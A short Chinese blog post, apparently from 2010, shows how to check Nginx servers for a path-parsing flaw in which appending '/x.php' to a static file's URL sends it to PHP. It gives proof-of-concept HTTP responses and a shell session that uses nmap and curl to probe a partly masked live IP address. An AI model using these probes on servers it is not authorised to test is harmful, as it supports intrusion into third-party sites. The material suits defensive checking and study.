本文通过实例演示如何检查Web服务器(如Nginx)的安全配置,利用特定请求揭示潜在的安全问题,例如不当的内容类型处理可能导致的漏洞。
Please Check your server.
http://www.80sec.com/nginx-securit.html
http://www.80sec.com/iis-cgifastcgi-security-hol.html
Poc:
访问 http://testsite/robots.txt
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes
访问 http://testsite/robots.txt/80sec.php
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6
其中的Content-Type的变化说明了后端负责解析的变化,该站点就可能存在漏洞。
演示:
pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205
Interesting ports on 218.xx.xx.205:
PORT STATE SERVICE VERSION
80/tcp open http nginx web server 0.8.15
pentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png -# | grep “Content-Type”
0.0%
Content-Type: image/png
pentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png/test.php -# | grep “Content-Type”
Content-Type: text/html
Reference:
[1]http://hi.baidu.com/yuange1975/blog/item/4c223031a6727eaf5edf0e46.html
[2]http://www.laruence.com/2010/05/20/1495.html
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
